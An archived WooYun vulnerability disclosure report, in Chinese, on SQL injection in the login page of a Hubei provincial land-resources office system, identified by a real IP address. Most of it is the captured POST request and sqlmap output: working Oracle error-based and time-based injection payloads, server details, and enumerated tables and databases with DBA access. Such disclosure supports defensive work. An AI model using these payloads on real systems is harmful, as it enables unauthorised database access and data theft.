乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-12: 细节已通知厂商并且等待厂商处理中 2014-01-17: 厂商已经确认,细节仅向厂商公开 2014-01-27: 细节向核心白帽子及相关领域专家公开 2014-02-06: 细节向普通白帽子公开 2014-02-16: 细节向实习白帽子公开 2014-02-26: 细节向公众公开
湖北省国土资源厅某办公系统SQL注入
问题URL:http://119.97.204.202/ydegov/index.aspx用户、密码和验证码随便写,burp抓包
POST /ydegov/index.aspx HTTP/1.1Host: 119.97.204.202User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://119.97.204.202/ydegov/index.aspxConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 125__VIEWSTATE=%2FwEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin&txt_UserPwd=123&tbValidation=3245&bt_Login=
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:---Place: POSTParameter: txt_UserName Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 3328=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(102)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3328=3328) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(107)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZMac'='ZMac&txt_UserPwd=123&tbValidation=3245&bt_Login= Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 8031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(103)||CHR(73)||CHR(74),5) AND 'wdsp'='wdsp&txt_UserPwd=123&tbValidation=3245&bt_Login=---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oraclesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txt_UserName Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 3328=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(102)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3328=3328) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(107)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZMac'='ZMac&txt_UserPwd=123&tbValidation=3245&bt_Login= Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 8031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(103)||CHR(73)||CHR(74),5) AND 'wdsp'='wdsp&txt_UserPwd=123&tbValidation=3245&bt_Login=---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'HBYD'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txt_UserName Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 3328=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(102)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3328=3328) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(107)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZMac'='ZMac&txt_UserPwd=123&tbValidation=3245&bt_Login= Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: __VIEWSTATE=/wEPDwUIMzIzNTUzMjNkZFZFWpB5ZvJjFSAxmiE3AWpmmBKX&txt_UserName=admin' AND 8031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(103)||CHR(73)||CHR(74),5) AND 'wdsp'='wdsp&txt_UserPwd=123&tbValidation=3245&bt_Login=---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: OracleDatabase: HBYD[79 tables]+----------------------+| 勘查项目受理 || 探矿权转让 || 采矿申请登记 || 采矿转让登记 || APP_GROUPS || APP_MENU || APP_ROLE || APP_USER || APP_USERCONFIG || APP_USER_ROLE || AREACODE || BJLCTABLE || DBM_INFO || DBM_TYPE || DICT_MANAGE || DZ02WFYDYSGBYJ || DZ02WFYDYSGHYJ || DZ02WFYDYSHJYJ || DZ02WFYDYSHZYJ || DZ02WFYDYSLYYJ || DZ02WFYDYSSPCWYJ_HS || DZ02WFYDYSZDYJ || DZ02WFYDYSZHYJ || DZ02WFYDYSZYYJ || DZ02WF_YDYS_FSZYJ || DZ05WFYDSPCWYJ_HS || DZ05WFYDSPDJCYJ || DZ05WFYDSPGBCHS || DZ05WFYDSPGHCHS || DZ05WFYDSPLEDYJ || DZ05WFYDSPLYCHS || DZ05WFYDSPSL || DZ05WFYDSPZDCHS || DZ05WFYDSPZFJYJ || DZ05WFYDSPZHYJB || DZ05WF_YDSP_FSZYJ || DZ06WFTDFKCWCYJ || DZ06WFTDFKDJCYJB || DZ06WFTDFKGBCSCB || DZ06WFTDFKGBCYJ || DZ06WFTDFKGHCYJ || DZ06WFTDFKGHSJ || DZ06WFTDFKQTYJB || DZ06WFTDFKZHYJB || EVENTLOG || EVENTLOGTYPE || FWDBX || FWDBX_BZ || FWFH || FWHQ || FWNEWDBX || FWNG || FWSH || FWTZHQ || FWZGTZ || GONGWENFJB || GWDICT || GWFW || GWSW || JSYD_MONEY || K_CASENO || K_SPB || K_S_HSB || K_S_JDB || K_S_SZB || K_S_YCB || K_TK_HS || MOBILEDKMAP || MOBILEOFFICETBL || MOBILE_SMS || RARBLOB || VFDMNGFLDS || VFDMNGTBLS || WORKFLOWHSB || ZSWFPAGEANDEVENTCODE || ZSWFRECEIVEDOCFORM || ZSWF_TDZL_AJZT || ZSWF_YDSP_AJZT || ZSWF_YJ |+----------------------+
一共79个表,16个数据库
available databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HBYD[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
DBA权限啊。。。。
找开发修复吧
危害等级:高
漏洞Rank:11
确认时间:2014-01-17 08:34
暂无